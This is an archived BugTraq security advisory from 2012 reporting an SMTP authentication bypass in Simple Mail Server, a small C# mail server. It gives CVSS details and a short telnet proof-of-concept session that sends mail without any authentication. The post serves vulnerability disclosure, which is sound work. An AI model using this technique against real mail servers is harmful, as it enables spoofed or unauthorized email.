BugTraq
Simple Mail Server - SMTP Authentication Bypass Vulnerability Jan 08 2012 03:10PM
demonalex 163 com (1 replies)
Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability

Software : Simple Mail Server

Software Version : 2011-12-30

Vendor: http://simplemailsvr.sourceforge.net/

Class: Origin Validation Error

CVE:

Remote: Yes

Local: No

Published: 2012-01-08

Updated:

CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

Impact : Medium (4 < 6.4 < 8)

Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp client(such as telnet).
And it did not have SMTP authentication contoller.

POC(Remarks: domain alex.com and user alex (at) alex (dot) com [email concealed] must be exists in configuration for this test case):
>telnet 127.0.0.1 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
MAIL FROM: <alex (at) alex (dot) com [email concealed]>
250 OK
RCPT TO: <alex (at) alex (dot) com [email concealed]>
250 OK
Data
354 Start mail input; end with <CRLF>.<CRLF>
From: "alex (at) alex (dot) com [email concealed]" <alex (at) alex (dot) com [email concealed]>
To: "alex (at) alex (dot) com [email concealed]" <alex (at) alex (dot) com [email concealed]>
Subject: authenticate is not required!

[ reply ]
Re: Simple Mail Server - SMTP Authentication Bypass Vulnerability Jan 10 2012 12:21PM
Peter Conrad (conrad tivano de)


 

Privacy Statement
Copyright 2010, SecurityFocus